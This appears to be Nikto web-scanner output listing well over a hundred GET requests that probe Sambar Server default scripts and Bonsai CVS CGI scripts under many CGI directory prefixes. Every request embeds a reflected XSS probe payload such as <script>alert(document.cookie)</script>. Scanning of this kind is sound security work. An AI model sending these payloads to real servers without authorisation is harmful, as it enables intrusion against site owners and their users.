+ OSVDB-5101: GET /cgibin/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgis/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /scripts/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi-win/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /fcgi-bin/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi-exe/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi-home/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5101: GET /cgi-perl/environ.pl?param1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5102: GET /syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5102: GET /syshelp/stmex.stm?foo=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5103: GET /syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5104: GET /syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5105: GET /syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5106: GET /netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5107: GET /netutils/findata.stm?host=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5107: GET /netutils/findata.stm?user=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5108: GET /sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi.cgi/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /webcgi/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi-914/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi-915/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /mpcgi/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /ows-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi-local/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /htbin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgibin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgis/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /scripts/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi-win/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /fcgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi-exe/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi-home/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5457: GET /cgi-perl/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi.cgi/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /webcgi/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-914/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-915/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /mpcgi/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /ows-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-local/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /htbin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgibin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgis/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /scripts/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-win/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /fcgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-exe/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-home/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-perl/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi.cgi/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /webcgi/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-914/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-915/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /mpcgi/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /ows-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-local/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /htbin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgibin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgis/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /scripts/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-win/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /fcgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-exe/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-home/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5458: GET /cgi-perl/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi.cgi/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /webcgi/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-914/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-915/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /mpcgi/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /ows-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-local/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /htbin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgibin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgis/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /scripts/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-win/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /fcgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-exe/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-home/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-perl/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi.cgi/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /webcgi/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-914/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-915/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /bin/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /mpcgi/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /ows-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-local/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /htbin/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgibin/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgis/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /scripts/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-win/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /fcgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-exe/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-home/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5459: GET /cgi-perl/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi.cgi/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /webcgi/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi-914/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi-915/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /mpcgi/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /ows-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi-local/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /htbin/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgibin/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgis/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /scripts/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi-win/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /fcgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi-exe/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi-home/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5460: GET /cgi-perl/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
